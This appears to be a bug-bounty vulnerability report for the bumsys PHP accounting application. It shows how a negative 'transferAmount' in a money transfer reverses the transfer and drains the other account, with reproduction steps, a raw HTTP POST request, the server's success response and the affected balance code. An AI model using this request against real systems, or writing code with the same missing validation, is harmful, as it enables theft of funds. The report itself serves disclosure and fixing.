Input validation and money transfer vulnerability with negative number in unilogies/bumsys

Valid

Reported on

Mar 28th 2023

Description

I transfer money from account_1 to account_2. According to the scenario, account 1 will be deducted, and account 2 will add money. But account_1 was add, account was sub. If I use a negative number and its value exceeds the account balance, the money will still be added to the transfer account, minus the other account balance.

Proof of Concept

Step 1. Create two account and not tick on "Negative value is allowed"
Step 2. Create tranfer money from account_1 to account_2
Step 3. Fill Amount with value is a negative number (param: transferAmount)
Step 4. View account list and balance

Request:


POST /bumsys/xhr/?module=accounts&page=addNewTransfer HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 9c12e4b9e57bc9efb83a996e70ecb27d6416958b
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------233078791433030603453235893249
Content-Length: 713
Origin: http://localhost
Connection: close
Referer: http://localhost/bumsys/accounts/transfer-money/
Cookie: ea_session=j82te0avsr7l1ftll04hv52gla175nsp; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3; __e80d6ab52f32c63981a432872f0499f854e14685=1m2rjbbsnltbe4rjaue2d8pmig; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferDate"

2023-03-29
-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferAcountsFrom"

6
-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferAcountsTO"

7
-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferAmount"

-100
-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferDescription"

Send money to account_2
-----------------------------233078791433030603453235893249--

Response:

HTTP/1.1 200 OK
Date: Tue, 28 Mar 2023 18:42:29 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
X-Powered-By: PHP/8.2.0
X-Frame-Options: DENY
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 69
Connection: close
Content-Type: text/html; charset=UTF-8

<div class='alert alert-success'>Transfer sucessfully completed</div>

Poc PDF Here

Image account list and balance

Impact

Take money from another account by money tranfer

Occurrences

ajax.php L458-L517

functions.php L1879-L2004

   $accounts_balance = ( 
                            $gad["accounts_opening_balance"] + $gad["capital_amounts_sum"] + $gad["incomes_amount_sum"] + $gad["transfer_received_amount_sum"] + $gad["received_payments_amount_sum"] + $gad["payment_incoming_return_amount_sum"] + $gad["journal_incoming_payment_sum"]
                        ) - ( 
                            $gad["loan_amount_sum"] + $gad["payment_amount_sum"] + $gad["transfer_send_amount_sum"] + $gad["advance_payment_amount_sum"] + $gad["journal_outgoing_payment_sum"] + $gad["payment_outgoing_return_amount_sum"]
                        );